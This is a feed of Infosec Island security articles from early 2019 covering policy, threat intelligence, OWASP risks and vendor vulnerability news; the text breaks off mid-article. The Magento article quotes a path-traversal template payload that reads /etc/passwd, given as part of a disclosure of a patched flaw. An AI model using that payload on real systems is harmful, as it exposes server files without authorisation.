Infosec Island Latest Articles https://infosecisland.infosecisland.com Adrift in Threats? Come Ashore! en hourly 1 Trump Administration Starts the Ball Rolling with the National Cyber Strategy https://www.infosecisland.com/blogview/25173-Trump-Administration-Starts-the-Ball-Rolling-with-the-National-Cyber-Strategy.html https://www.infosecisland.com/blogview/25173-Trump-Administration-Starts-the-Ball-Rolling-with-the-National-Cyber-Strategy.html Tue, 19 Feb 2019 06:11:07 -0600 The Trump Administration has released a comprehensive National Cyber Strategy (NCS) that, if fully implemented, could address claims that the critical issue of current cyberspace threats are not being taken seriously enough. The report outlines a plan that spans all federal agencies, directing how they should work separately and in tandem with private industry and the public to detect and prevent cyber attacks before they happen, as well as mitigate damage in the aftermath.

The NCS is the first formal attempt in 15 years to plan and implement a national policy for the cyber arena and takes the form of a high-level policy statement rather than the more targeted method of a Presidential directive. The plan offers plenty in the way of big picture goals, but critics will watch to to see whether forthcoming details will emerge in the coming months and years to fill in the gaps with specific action.

With the release, the Administration formally recognizes that cyberspace has become such an entwined part of American society as to be functionally inseparable. The bottom line is that cybersecurity now falls under the larger umbrella of national security and is not considered a standalone entity.

Army Lt. Gen. Paul Nakasone, speaking at his recent confirmation hearing for the position of leader of U.S. Cyber Command and the secretive National Security Agency, emphasized the importance of this moment in our national history: “We are at a defining time for our Nation and our military...threats to the United States’ global advantage are growing -- nowhere is this challenge more manifest than in cyberspace.”

Sifting through the digital pages of the NCS document reveals the Administration’s focus on the four conceptual pillars of National Security that now have been expanded to accommodate cyber concerns.

Pillar 1: Protecting and Securing the American Way of Life

Considering the present mashup state of the federal procurement process, the new aim is to secure government computer networks and information, primarily through tougher standards, cross-agency cooperation, and the strengthening of US government contractor systems and supply chain management. Electronic surveillance laws will also likely be bolstered, a reality that may result in the netting of more criminals but poses privacy concerns to those who think that the line has been smudged too times in this area already.

Securing all levels of election infrastructure against hacks and misinformation falls into this category. If recent history is any indication, the coming 2020 presidential election will likely inspire a flurry of attempted cyber intrusions.

Pillar 2: Focus on American Prosperity

Operating on the assumption that economic security is intrinsically linked to national security, the NCS lays out a strategy to achieve financial strength through fortification of the technological ecosystem. Plans are to be developed to support and reward those in the marketplace who create, adopt, and push forward the innovation of online security processes.

Though debates over funds for national infrastructure are eternal, the discussion will now expand to include the security and promotion of technology infrastructure as well, especially as it relates to the 5G network protocol, quantum computing, blockchain technology, and artificial intelligence.  

Pillar 3: Peace Through Strength

As the world becomes ever more digitized, criminals have moved offline operations into cyberspace. Perhaps unsurprisingly, the Trump Administration intends to push back hard against efforts to disrupt, deter, degrade, or destabilize the world from both nations and non-nation actors.

National security advisor John Bolton, though refusing to specify operations or adversaries, emphasized the point to USA Today that aggressive action should be expected, saying, “We are going to do a lot of things offensively. Our adversaries need to know that.”

At least part of this offensive strategy will include the creation of an international law framework (called the CDI or Cyber Deterrence Initiative) that will be charged with policing cyberspace behavior and organizing a cooperative response for those who flaunt the standards. The CDI’s stated goals will be to counter sources of online disinformation and propaganda with its own brand of the same.

Pillar 4: Advance American Influence

By staking out an America-first role as thought and action leader in cyberspace, the NCS promises to take the lead in collaborating with like-minded partners to create and preserve a secure, free internet. Considering the well-known surveillance efforts of organizations like the Five Eyes, one can’t help but wonder if the term “internet freedom” is an oxymoron in the making with the government leading the way.

With the NCS, the Trump Administration has laid out a broad platform for addressing cybersecurity concerns. If it’s the down and dirty details of how exactly this will happen you seek, sorry to disappoint, but it’s not in there.

With the next big election close enough to smell, and Congress divided, little to nothing of legislative importance will likely unfold in the near future, including Democrats and Republicans finding the motivation to drag out their Crayons and fill in the president’s cybersecurity outline.

Until then, let’s hope the internet doesn’t implode under an onslaught of fake news, cat videos, and hackers gone wild. One thing you can bet your last dollar on -- the topic of cybersecurity won’t go away. Like national security in general, it will remain eternal fodder for future politicians to bat around. As to whether the NCS will actually make a difference, only time will tell.

Meanwhile, Nero fiddles and Rome burns.

About the author: A former defense contractor for the US Navy, Sam Bocetta turned to freelance journalism in retirement, focusing his writing on US diplomacy and national security, as well as technology trends in cyberwarfare, cyberdefense, and cryptography.

Copyright 2010 Respective Author at Infosec Island]]>
A Call to Structure https://www.infosecisland.com/blogview/25174-A-Call-to-Structure.html https://www.infosecisland.com/blogview/25174-A-Call-to-Structure.html Fri, 15 Feb 2019 05:15:00 -0600 When building a threat Intelligence team you will face a range of challenges and problems. One of the most significant ones is about how to best take on the ever-growing amount of Threat Intel. It might sound like a luxurious problem to have: The more intel the better! But if you take a closer look at what the available Threat Intelligence supply looks like, or rather, the way it is packaged, the problem becomes apparent. Ideally, you would want to take this ever-growing field of Threat Intelligence supply and work to converge on a central data model – specifically, STIX (Structured Threat Information eXpression). STIX is an open standard language supported by the OASIS open standards body, designed to represent structured information about cyber threats

This isn’t a solo effort, so first the intelligence team needs to align properly with the open standards bodies. I was thrilled to deliver our theories around STIX data modeling to the OASIS and FIRST communities at the Borderless Cyber Conference in Prague in 2017. (The slides from this are available for download here.) Our team took this to the next level as we started to include not just standard data structures in our work, but standardized libraries, including MITRE’s ATT&CK (Adversarial Tactics, Techniques & Common Knowledge) framework that now forms a core part of our TTP (and, to some extent, Threat Actor) mapping across our knowledge base. We couldn’t have done it without the awesome folk at OASIS and MITRE. Those communities are still our cultural home.

So far, so good… but largely academic. The one thing I always say to teams who start planning their CTI journeys is: “Deploy your theory to practice ASAP – because it will change.” CTI suppliers know this all too well. In the ensuing months of our threat intel team, we faced the challenge of merging these supplier sources in to a centralized knowledge base. We’re currently up to 38 unique source organizations (with 50+ unique feeds across those suppliers), around a third of those being top-flight commercial suppliers. And, of course, even in this age of STIX, and MISP, we still see the full spectrum of implementations from those suppliers. Don’t get me wrong – universal STIX adoption is a utopia (this is my version of ‘memento mori’ that I should get my team to say to me every time I go on my evangelism sprees). And we should not expect all suppliers to ‘conform’ in some totalitarian way. But here is my question to you: Who designs your data model? I would love to meet them.

Now here’s the thing: If you’re anything like my boss, you probably don’t care how the data model is implemented – so long as the customer can get the data fields they need from your feed, what does it matter? REST + JSON everywhere, right? But the future doesn’t look like that. The one thing that the STIX standard is teaching people better than most other structured languages is the importance of decentralization. I should be able to use the STIX model to build intelligence in one location and have it be semantically equivalent (though not necessarily the same) as the equivalent built by a different analyst in another location. The two outputs should be logically similar – recognizably so, by some form of automated interpretation that doesn’t require polymorphism or a cryptomining rig to calculate – but different enough to capture the unique artistry of the analysts who created them. Those automatically discernible differences are the pinnacle of a shared, structured-intelligence knowledge base that will keep our data relevant, allow for automated cross-referencing and take the industry to the next level.

There is a downside, of course. The cost of implementation is the first hurdle – it may mean reengineering a data model and maybe even complete rebuilds of knowledge repositories. With any luck, it can just be a semantic modelling (similar to what I presented at Borderless Cyber, but instead of STIX 1.2 à STIX 2.1, just à STIX 2.1) that you can describe with some simple mapping and retain your retcon. But perhaps the biggest elephant in the room is that aligning all suppliers to a common data model means leaving people open to de-duplication and cross-referencing. As we start to unify our data models, that “super-secret source” that was actually just a re-package of some low-profile, open source feed is going to get doxed. We think this is a good thing – data quality, uniqueness and provenance will speak for themselves, and those suppliers who vend noise will lose business. This should be an opportunity rather than a threat, and hopefully it will reinforce supplier business models to provide truly valuable intelligence to customers.

About the author: Chris O'Brien is the Director Intelligence Operations at EclecticIQ. Prior to his current role, Chris held the post of Deputy Technical Director at NCSC UK specialising in technical knowledge management to support rapid response to cyber incidents.

Copyright 2010 Respective Author at Infosec Island]]>
What CEOs Need to Know About the Future of Cybersecurity https://www.infosecisland.com/blogview/25172-What-CEOs-Need-to-Know-About-the-Future-of-Cybersecurity.html https://www.infosecisland.com/blogview/25172-What-CEOs-Need-to-Know-About-the-Future-of-Cybersecurity.html Thu, 14 Feb 2019 06:09:00 -0600 Until recently, Chief Executive Officers (CEOs) received information and reports encouraging them to consider information and cyber security risk. However, not all of them understood how to respond to those risks and the implications for their organizations. A thorough understanding of what happened, and why it is necessary to properly understand and respond to underlying risks, is needed by the CEO, as well as all members of an organization’s BoD, in today’s global business climate. Without this understanding, risk analyses and resulting decisions may be flawed, leading organizations to take on greater risk than intended.

After reviewing the current threat landscape, I want to call specific attention to four prevalent areas of information security that all CEOs need to be familiar with in the day to day running of their organization.

Risk Management

Cyberspace is an increasingly attractive hunting ground for criminals, activists and terrorists motivated to make money, get noticed, cause disruption or even bring down corporations and governments through online attacks. Over the past few years, we’ve seen cybercriminals demonstrating a higher degree of collaboration amongst themselves a degree of technical competency that caught many large organizations unawares. 

CEOs must be prepared for the unpredictable so they have the resilience to withstand unforeseen, high impact events. Cybercrime, along with the increase in online causes (hacktivism), the increase in cost of compliance to deal with the uptick in regulatory requirements coupled with the relentless advances in technology against a backdrop of under investment in security departments, can all combine to cause the perfect threat storm. Organizations that identify what the business relies on most will be well placed to quantify the business case to invest in resilience, therefore minimizing the impact of the unforeseen.

Avoiding Reputational Damage

Attackers have become more organized, attacks have become more sophisticated, and all threats are more dangerous, and pose more risks, to an organization’s reputation. In addition, brand reputation and the trust dynamic that exists amongst suppliers, customers and partners have appeared as very real targets for the cybercriminal and hacktivist. With the speed and complexity of the threat landscape changing on a daily basis, all too often we’re seeing businesses being left behind, sometimes in the wake of reputational and financial damage.

CEOs need to ensure they are fully prepared to deal with these ever-emerging challenges by equipping their organizations better to deal with attacks on their reputations. This may seem obvious, but the faster you can respond to these attacks on reputation, the better your outcomes will be.

Securing the Supply Chain

When I look for key areas where information security may be lacking, one place I always come back to is the supply chain. Supply chains are the backbone of today’s global economy and businesses are increasingly concerned about managing major supply chain disruptions. Rightfully so, CEOs should be concerned about how open their supply chains are to various risk factors. Businesses must focus on the most vulnerable spots in their supply chains now. The unfortunate reality of today’s complex global marketplace is that not every security compromise can be prevented beforehand.

Being proactive now also means that you – and your suppliers – will be better able to react quickly and intelligently when something does happen. In extreme but entirely possible scenarios, this readiness and resiliency may dictate competitiveness, financial health, share price, or even business survival.

Employee Awareness and Embedded Behavior

Organizations continue to heavily invest in ‘developing human capital’. No CEOs speech or annual report would be complete without stating its value. The implicit idea behind this is that awareness and training always deliver some kind of value with no need to prove it - employee satisfaction was considered enough. This is no longer the case. Today’s CEOs often demand return on investment forecasts for the projects that they have to choose between, and awareness and training are no exception. Evaluating and demonstrating their value is becoming a business imperative. Unfortunately, there is no single process or method for introducing information security behavior change, as organizations vary so widely in their demographics, previous experiences and achievements and goals.

While many organizations have compliance activities which fall under the general heading of ‘security awareness’, the real commercial driver should be risk, and how new behaviors can reduce that risk. The time is right and the opportunity to shift away from awareness to tangible behaviors has never been greater. CEOs have become more cyber-savvy, and regulators and stakeholders continually push for stronger governance, particularly in the area of risk management. Moving to behavior change will provide the CISO with the ammunition needed to provide positive answers to questions that are likely to be posed by the CEO and other members of the senior management team.

Stay Ahead of Possible Security Stumbling Blocks

Businesses of all shapes and sizes are operating in a progressively cyber-enabled world and traditional risk management isn’t agile enough to deal with the risks from activity in cyberspace. Enterprise risk management must be extended to create risk resilience, built on a foundation of preparedness, that evaluates the threat vectors from a position of business acceptability and risk profiling. 

Organizations have varying degrees of control over evolving security threats and with the speed and complexity of the threat landscape changing on a daily basis, far too often I’m seeing businesses getting left behind, sometimes in the wake of reputational and financial damage. CEOs need to take the lead and take stock now in order to ensure that their organizations are better prepared and engaged to deal with these ever-emerging challenges.

About the author: Steve Durbin is Managing Director of the Information Security Forum (ISF). His main areas of focus include strategy, information technology, cyber security and the emerging security threat landscape across both the corporate and personal environments. Previously, he was senior vice president at Gartner.

Copyright 2010 Respective Author at Infosec Island]]>
Who’s Responsible for Your Cyber-Security? https://www.infosecisland.com/blogview/25169-Whos-Responsible-for-Your-Cyber-Security.html https://www.infosecisland.com/blogview/25169-Whos-Responsible-for-Your-Cyber-Security.html Tue, 12 Feb 2019 05:56:00 -0600 Threats to online security are constantly evolving, and organisations are more aware than ever of the risks that it can pose. But no matter how seriously cyber security is viewed by most businesses, many still fall short of properly addressing some of the biggest issues. In fact, recent figures from the government show that over four in ten UK businesses have suffered a cyber breach or attack within the last 12 months.

Two of the most common attacks are due to issues with basic computer hygiene, including fraudulent emails and cyber criminals impersonating organisations. The bigger question isn’t how to secure your business, but who takes ownership of the cyber security process.

Not just the IT department’s responsibility

The responsibility for an organisation’s cyber security often falls on the IT department, which historically dealt with the security of IT systems. At face value this makes sense - as the resident tech experts, the IT department is often best positioned to choose the tools and solutions that make a business secure.

In general, these tools serve the purpose of assessing and encrypting your sensitive information, or blocking malicious activity at the source. But cyber threats can often begin outside the IT department. It only takes a single staff member opening a malicious attachment or clicking on a link in a phishing email for hackers to find a way in, and sometimes even the most sophisticated cyber security solutions can’t prevent this.

This makes it next to impossible for the IT department to keep the entire organisation secure, since they can’t be constantly monitoring every person’s click of the mouse. The onus, therefore, falls on every single staff member within the organisation to be cyber aware.

Do the board need to be involved?

High-profile, malicious attacks, such as WannaCry and NotPetya, have grown increasingly prolific in recent years. The potentially devastating effects of these attacks has meant that cyber security has become an integral facet of an organisation’s risk assessment and management.

But despite the prevalence of these successful attacks, there is often still a lack of understanding amongst some board members when it comes to tackling these threats – in fact, our analysis found that only 30% of senior leadership teams have an in-depth understanding of the risks associated with evolving cyber threats.

Flagging the importance of cyber awareness with the board is therefore essential, particularly to increase their awareness of the most common cyber threats and any potential security gaps. More pressingly, the board often have direct access to the most sensitive data within your organisation, which makes them the perfect target for potential cyber criminals. Arming the board with the tools and knowledge to spot potentially malicious emails, links or attachments – in the same way that you would the rest of the organisation – could help to prevent potentially disastrous consequences. 

It’s everybody’s responsibility

Although cyber security certainly does need to be a board-level concern, it’s still important to remember that the safety of your organisation is everybody’s responsibility. As a security and technology expert within the business, you have an integral role in ensuring that everybody’s knowledge is up to scratch.

Thoroughly educating staff on the warning signs to look out for in order to spot a malicious email, or activities that they should avoid when using business devices can greatly improve the overall cyber security of your business. When combined with encryption, and other online security tools, the likelihood of experiencing a cyber attack can be greatly diminished. Cyber security is everybody’s responsibility – make sure that staff have the tools, and the knowledge, to do it properly.

Matt Johnson is Chief Technology Officer at Intercity Technology. With over 25 years’ business and technical experience in providing IT solutions, Matt’s expertise covers the design, implementation, support and management of complex communications networks.

Copyright 2010 Respective Author at Infosec Island]]>
CERT/CC Warns of Vulnerabilities in Marvell Avastar Wireless SoCs https://www.infosecisland.com/blogview/25171-CERTCC-Warns-of-Vulnerabilities-in-Marvell-Avastar-Wireless-SoCs.html https://www.infosecisland.com/blogview/25171-CERTCC-Warns-of-Vulnerabilities-in-Marvell-Avastar-Wireless-SoCs.html Fri, 08 Feb 2019 10:57:12 -0600 The CERT Coordination Center (CERT/CC) has issued a vulnerability note providing information on a series of security issues impacting Marvell Avastar wireless system on chip (SoC) models.

Initially presented by Embedi security researcher Denis Selianin at the ZeroNights conference on November 21-22, 2018, and tracked as CVE-2019-6496(CVSS score 8.3), the vulnerability could allow an unauthenticated attacker within Wi-Fi radio range to execute code on a vulnerable system. 

The security researcher discoveredmultiple vulnerabilities in the Marvell Avastar devices (models 88W8787, 88W8797, 88W8801, and 88W8897), the most important of which is a block pool overflow during Wi-Fi network scan.

The vulnerability can be exploited via malformed Wi-Fi packets during identification of available Wi-Fi networks. 

“During Wi-Fi network scans, an overflow condition can be triggered, overwriting certain block pool data structures. Because many devices conduct automatic background network scans, this vulnerability could be exploited regardless of whether the target is connected to a Wi-Fi network and without user interaction,” the CERT/CC vulnerability note reads.

Depending on the implementation, the attack could result in either network traffic interception or in achieving code execution on the host system. 

Marvell has already acknowledged the issue and released a statement revealing that it has already deployed a fix in their standard driver and firmware. 

“We have communicated to our direct customers to update to Marvell’s latest firmware and driver to get the most recent security enhancements, including support for WPA3,” Marvell said. 

Given that the vulnerability requires the attacker to be within Wi-Fi radio range of the target, users can mitigate exploitation by restricting access to the area around vulnerable devices. Disabling Wi-Fi on systems that have other connectivity options should also prevent the attack, CERT/CC says. 

“Marvell is not aware of any real world exploitation of this vulnerability outside of a controlled environment,” Marvell noted, encouraging customers to contact their Marvell representative for additional support.  

The United States Computer Emergency Team too encouragesusers and administrators to review CERT/CC’s Vulnerability Note and refer to vendors for appropriate updates.

RelatedResearcher Escalates Privileges on Exchange 2013 via NTLM Relay Attack

RelatedVulnerability Exposes Rockwell Controllers to DoS Attacks

Copyright 2010 Respective Author at Infosec Island]]>
Mozilla Concerned of Facebook’s Lack of Transparency https://www.infosecisland.com/blogview/25170-Mozilla-Concerned-of-Facebooks-Lack-of-Transparency.html https://www.infosecisland.com/blogview/25170-Mozilla-Concerned-of-Facebooks-Lack-of-Transparency.html Tue, 05 Feb 2019 21:46:03 -0600 Mozilla is concerned about Facebook’s lack of transparency regarding political advertising, Chief Operating Officer Denelle Dixon said last week in a letter to the European Commission.

Mozilla is currently working to launch its Firefox Election package for the European Union Parliament Elections and says it is not able to provide EU residents with the desired transparency, mainly due to challenges encountered with their Ad Analysis for Facebook add-on. 

The add-on, Dixon explains, analyzes a user’s Facebook feed to identify ads and how the user is being targeted, and informs the user on that. The data is also compared to information from public sources, to show differences in ads served to specific users.

“These two pieces of functionality are critical to bringing greater transparency to political advertising and to advertising in general. However, recent changes to the Facebook platform have prevented third parties from conducting analysis of the ads users are seeing. This limits our ability to deliver the first piece of functionality identified above,” the letter (PDF) reads. 

Dixon also points out that “there is currently a lack of publicly available data about political advertising on Facebook in the European Union that can be compared to information about what ads users are seeing.” 

The issue, Dixon says, is that Facebook hasn’t yet fulfilled its commitments under the Political advertising and issue-based advertisingsection of the Code of Practice on Disinformation

She also points out that, although Facebook said in August it would roll out an Ad Archive API to make “advertising more transparent to help prevent abuse on Facebook, especially during elections,” the social platform has kept the API private. 

Recently, Facebook also said it would release a new political transparency tool in March, but Mozilla believes the tool will be similar to the Ad Archive website made available in the United States last year. 

“This site allows for simple key word searches. We do not believe that the site meets the commitments in the Code. It has design limits that prevent more sophisticated research and trend analysis on the political ads,” Dixon notes. 

“Transparency cannot just be on the terms with which the world’s largest, most powerful tech companies are most comfortable. To have true transparency in this space, the Ad Archive API needs to be publicly available to everyone,” she continues. 

Dixon, who encourages the Commission to raise these concerns with Facebook directly, reveals that Mozilla has spoken to Facebook about these concerns, but that a path towards meaningful public disclosure of the data needed hasn’t been identified yet. 

“We urge Facebook to develop an open, functional API that can be used by any developer, researcher, or organisation to develop tools, critical insights, and research designed to educate and empower users to understand and therefore resist targeted disinformation campaigns,” Dixon notes. 

RelatedMisinformation Woes Could Multiply With 'Deepfake' Videos

RelatedIsrael Seeks to Beat Election Cyber Bots

Copyright 2010 Respective Author at Infosec Island]]>
OWASP: What Are the Top 10 Threats and Why Does It Matter? https://www.infosecisland.com/blogview/25168-OWASP-What-Are-the-Top-10-Threats-and-Why-Does-It-Matter-.html https://www.infosecisland.com/blogview/25168-OWASP-What-Are-the-Top-10-Threats-and-Why-Does-It-Matter-.html Wed, 30 Jan 2019 06:00:00 -0600 Since the founding of the Open Web Application Security Project (OWASP) in 2001, it has become a leading resource for online security best practices. OWASP identifies itself as an open community dedicated to enabling organizations to develop and maintain applications and APIs that are protected from common threats and exploits.

In particular, they publish a list of the “10 Most Critical Web Application Security Risks,” which effectively serves as a de facto application security standard. The “Top 10” are the most critical risks to web application security, as selected by an international group of security experts. The free information lists several vulnerabilities that are easy to overlook, including insufficient attack protection in applications, cross-site request forgeries, broken access controls, under-protected APIs, and more.

Nearly every organization requires an online presence to conduct business, which means virtually every organization should be aware of web-based vulnerabilities and design a plan to address them. Understanding the OWASP Top 10 is the first step toward ensuring you won’t leave yourself vulnerable.

Top 10 web application threats to know

  1. Injection: Injection flaws such as SQL, NoSQL, OS, and LDAP injections can attack any source of data and involve attackers sending malicious data to a recipient. This is a very prevalent threat in legacy code and can result in data loss, corruption, access compromise, and complete host takeover. Using a safe database API, a database abstraction layer, or a parameterized database interface helps reduce the risk of injection threats.
  2. Broken Authentication: Incorrectly implemented session management or authentication gives attackers the ability to steal passwords, tokens, or impersonate user identities. This is widespread due to poorly implemented identity and access controls. Implementing multi-factor authentication and implementing weak-password checks is a great start to preventing this problem. However, don’t fall into the trap of enforcing composition rules on passwords (such as requiring uppercase, lowercase, numeric and special characters), as these have been to weaken rather than strengthen security.
  3. Sensitive Data Exposure:  When web applications and APIs aren’t properly protected, financial, healthcare, or other personally identifiable information (PII) data can be stolen or modified and then used for fraud, identity theft, or other criminal activities. Proper controls, encryption, removal of unnecessary data, and strong authentication can help to prevent exposure. 
  4. External Entities (XXE): Attackers can exploit vulnerable XML processors if they include malicious content in an XML document or exploit vulnerabilities. External entities can disclose internal files or be used to execute internal port scanning, remote code execution, and DDoS attacks. It is difficult to identify and eliminate XXE vulnerabilities, but a few easy improvements are patching all XML processors, ensuring comprehensive validation of XML input according to a schema, and limiting XML input where possible.
  5. Broken Access Control: This happens when policies on what users can access are loosely enforced. This results in attackers exploiting flaws to access data and functionality they are not authorized to access, such as accessing other users’ accounts, viewing sensitive files, modifying other users’ data, and changing access rights. It is suggested to use access control that is enforced in trusted server-side code, or even better, an external API gateway.
  6. Security Misconfiguration: Misconfigurations are the most common threat to organizations. This results from insecure or incomplete default configurations, open cloud storage, and verbose error messages. It is essential to securely configure and patch all operating systems, frameworks, libraries, and applications, and to follow best practices suggested by each hardware or software vendor to harden their systems.
  7. Cross-Site Scripting (XSS): These flaws occur when an application includes untrusted data in a web page. With XSS flaws, attackers can execute scripts in the victim’s browser, which can result in hijacked user sessions, defaced websites, or redirecting the user to a malicious site. In order to prevent XSS, you must separate untrusted data from active browser content, for example by using libraries that automatically escape user input.
  8. Insecure Deserialization: Insecure deserialization often leads to remote code execution scenarios. Even if remote code execution doesn’t happen, these flaws can be used to perform replay, injection, and privilege escalation attacks. One way to prevent this is not to accept serialized objects from untrusted sources. 
  9. Using Components with Known Vulnerabilities: Components include operating systems, web servers, web frameworks, encryption libraries, or other software modules. Applications and APIs using components with known vulnerabilities will undermine application protection measures and enable several types of attacks. A strong patch management measure largely prevents this problem.
  10. Insufficient Logging and Monitoring: Insufficient logging and monitoring can allow attackers to spread unchecked within an organization, maintain persistence, and extract or destroy data. This results in attackers having access for weeks, sometimes months. Using an effective monitoring and incident alerting solution can close the gap and spot attackers much quicker.

Keep in mind that these top 10 threats are just the most common of thousands of vulnerabilities that cyber criminals can exploit. Many people overlook web applications when they plan their security, or they falsely assume web applications are protected by their network firewall. In fact, the web application threat vector is one of the most successfully exploited because of these misunderstandings. 

The best way to defend this threat vector is with a web application firewall (WAF) that is purpose-built to secure your web applications. These firewalls provide several types of Layer 7 security, including DDoS protection, server cloaking, web scraping protection, data loss prevention, web-based identity and access management, and more.  Including a web application firewall in an organization’s security strategy and technology stack will ensure protection from these top threats and the many other threats specifically targeting your applications.

About the AuthorNitzan Miron is VP of product management and application security at Barracuda Networks

Copyright 2010 Respective Author at Infosec Island]]>
Magento Patches Command Execution, Local File Read Flaws https://www.infosecisland.com/blogview/25167-Magento-Patches-Command-Execution-Local-File-Read-Flaws.html https://www.infosecisland.com/blogview/25167-Magento-Patches-Command-Execution-Local-File-Read-Flaws.html Tue, 29 Jan 2019 09:23:34 -0600 Magento recently addressed two vulnerabilities that could lead to command execution and local file read, a SCRT security researcher reveals. 

Written in PHP, Magento is a popular open-source e-commerce platform that is part of Adobe Experience Cloud. Vulnerabilities in Magento – and any other popular content management systems out there – are valuable to malicious actors, as they could be exploited to impact a large number of users.

In September last year, SCRT’s Daniel Le Gall found two vulnerabilities in Magento, both of which could be exploited with low privileges admin accounts, which are usually provided to Marketing users. 

The first of the two security bugs is a command execution using path traversal. Exploitation, the researchers reveal, requires the user to be able to create products. The second issue is a local file read that requires the user to be able to create email templates. 

The root cause of the first issue is a path traversal, whichLe Gall discoveredin a function that checks if a file that templates can be loaded from is located in certain directories. The faulty function only checks if the provided path begins by a specific directory name, but not if the resolved path is in the whitelisted directories. 

Because of the partial checks performed by the function, a path traversal can be called through a Product Design, but only to process .phtml files as PHP code. 

Although this is a forbidden extension on most upload forms, one could create a file with “Custom Options,” and could allow extensions they want to be uploaded, including phtml. Once ordered, the item is stored to a specific .extension, which allows for command execution, the researcher says. 

The second vulnerability was found in email templating, which allows the use of a special directive to load the content of a CSS file into the email. The two functions that are managing this directive are not checking for path traversal characters anywhere and an attacker could inject any file into the email template.

“Creating an email template with the {{css file="../../../../../../../../../../../../../../../etc/passwd"}} should be sufficient to trigger the vulnerability,”Le Gall says. 

The researcher disclosed both of these vulnerabilities in September last year, and a patch released at the end of November (Magento 2.2.7 and 2.1.16 released) addressed both of them. The researcher was awarded a total of $7500 in bug bounty rewards for the findings. 

RelatedHacked Magento Sites Steal Card Data, Spread Malware

RelatedMagento Patches Critical Vulnerability in eCommerce Platforms

Copyright 2010 Respective Author at Infosec Island]]>
The Biggest Security Hurdles in Your Business, and How to Overcome Them https://www.infosecisland.com/blogview/25166-The-Biggest-Security-Hurdles-in-Your-Business-and-How-to-Overcome-Them.html https://www.infosecisland.com/blogview/25166-The-Biggest-Security-Hurdles-in-Your-Business-and-How-to-Overcome-Them.html Wed, 23 Jan 2019 01:11:53 -0600 With cyber security spanning almost every aspect of a modern business, implementing effective mitigation policies is often a source of frustration for IT managers.

It’s widely accepted across the industry that with malicious attacks showing no signs of slowing down, organisations have no option but to invest considerable amounts of cash into hiring security professionals and maintaining business privacy. Gartner reported that costs for these investments into cyber security reached $86.4bn worldwide in 2017.

But despite these considerable investments, many organisations are still left in the dark when it comes to exactly what the most common, and pressing, cyber security challenges are, often significantly impacting any returns on this investment.

Selecting and deploying the right security technologies is an important first step, but educating your staff, and your board, can prove to be just as challenging. However, this can be rectified more cost effectively.

Keep your board in the loop

Online security processes are often left entirely to the IT department to manage. As little as 30% of senior business leaders have an in-depth of understanding of exactly what online security threats are, which should be a significant cause for concern. More pressingly, 7% have very little or even no understanding of the threats whatsoever.

This is particularly worrying when considering the fact that senior leadership are often the primary target for cyber criminals – in no small part due to the fact that their cyber security knowledge is lacking. This gives cyber criminals the most direct route to sensitive business information or personal data.

Keeping the board in the loop and educating them on what the latest online threats are, how the IT department could mitigate these, and the key things that they should be looking out for will give them a more well-rounded knowledge of cyber security in general, and help to demonstrate the importance of being cyber aware. 

Keep your staff up to speed

Cyber criminals are increasingly resorting to phishing attempts that impersonate board level executives, as well as using phishing PDFs and sites in an effort to target staff members. This method is especially effective against those who may be inexperienced in the role, and can often trick them into divulging sensitive business information.

It’s therefore vital that every staff member within your business has the knowledge and skills necessary to ensure the company stays secure. Since many successful cyber-attacks can be the product of carelessness – often opening malware hidden in attachments or clicking suspicious links – it’s everybody’s responsibility to enact proper due diligence when it comes to cyber security.

Educating staff on best practice, as well as informing them when you are actively stopping potential cyber security threats, can help them to understand the importance of cyber awareness within the company. Something as simple as informing staff on what to look out for when spotting a malicious email can help to nip potential disasters in the bud.

Choose the right security solution

The severity with which malware can affect your business cannot be understated. Indiscriminate cyber-attacks can have potentially devastating consequences for businesses. 

Regardless of the size of your organisation, or the complexity of your operations, it’s vital that your business has a thorough cyber security strategy. 

There are many end-to-end service providers out there that can assist your business by taking responsibility for implementing and managing effective security applications within your organisation. As an IT manager, this can help you to avoid the unexpected costs and rigidity that often come with installing and maintaining fixed security solutions internally.

When combined with educating both the board and the staff within your organisation, cyber security becomes a collaborative effort across your business, strengthening your first line of defence and creating a far more secure environment overall. 

About the author: Matt Johnson is Chief Technology Officer at Intercity Technology. With over 25 years’ business and technical experience in providing IT solutions, Matt’s expertise covers the design, implementation, support and management of complex communications networks.

Copyright 2010 Respective Author at Infosec Island]]>
Four Technologies that will Increase Cybersecurity Risk in 2019 https://www.infosecisland.com/blogview/25165-Four-Technologies-that-will-Increase-Cybersecurity-Risk-in-2019.html https://www.infosecisland.com/blogview/25165-Four-Technologies-that-will-Increase-Cybersecurity-Risk-in-2019.html Thu, 17 Jan 2019 09:21:55 -0600 Attackers are not just getting smarter, they are also using the most advanced technologies available, the same ones being used by security professionals – namely, artificial intelligence (AI) and machine learning (ML).

Meanwhile, the widespread adoption of cloud, mobile and IoT technologies has created a sprawling IT attack surface that is getting harder to protect from cyber threats, since fixing every existing vulnerability in these infrastructures is unfeasible and impossible.

Here are four ways attackers will exploit technology in new and creative ways over the next 12 months.

AI Bias will Pose New Security Risks

The bias issue is in its infancy now, but will grow rapidly this year and beyond. We can expect attackers to exploit the vulnerabilities associated with it.

Since algorithms are being applied everywhere, bias will follow them. For example, for AI to function properly in cybersecurity, a continuous feed of quality data is required. Garbage in will produce garbage out, such as too many false positives and/or too many false negatives. Furthermore, AI gives probable, rather than definitive answers.

We expect AI bias to increase this year, since many users are not updating their base data and results are not being verified by security analysts. Under these circumstances, AI can have the reverse effect for cybersecurity. Instead of making organizations more secure, AI will generate unreliable insights, that if followed will increase, not decrease, risk.

Automation/Orchestration Tools will be Hijacked

Automation and orchestration tools allow developers and security professionals to achieve new levels of speed and efficiency using unattended processes performed in software. These frameworks, if compromised by attackers, can be co-opted for malicious purposes.

For example, Kubernetes, the world’s most popular cloud container orchestration system, experienced its first major security vulnerability recently.

The bug, CVE-2018-1002105, aka the Kubernetes privilege escalation flaw, allows specially crafted requests to establish a connection through the Kubernetes API server to backend systems, then send arbitrary requests over the same connection directly to these machines.

Exploiting just one Kubernetes vulnerability would enable an attacker to take down containers across the globe. While the Kubernetes bug has been fixed, the writing on the wall is clear: more automation and orchestration tools will be targeted in the next 12 months.

Robotic Process Automation Will be Targeted

Robotic process automation (RPA) is being used to control a wide range of operational technologies in manufacturing and many other critical infrastructure sectors.

From a security standpoint, RPA creates a dangerous new attack surface that has multiple layers, including a robust web layer, an API layer, a data exchange layer, and so on. Plus, RPA systems lack robust defence mechanisms.

While we did not seen many RPA vulnerabilities disclosed in 2018 – this is likely to change this year as RPA solutions go increasingly mainstream. If exploited, these vulnerabilities could compromise an entire industrial plant or even several facilities at once.

API Attacks Will Increase

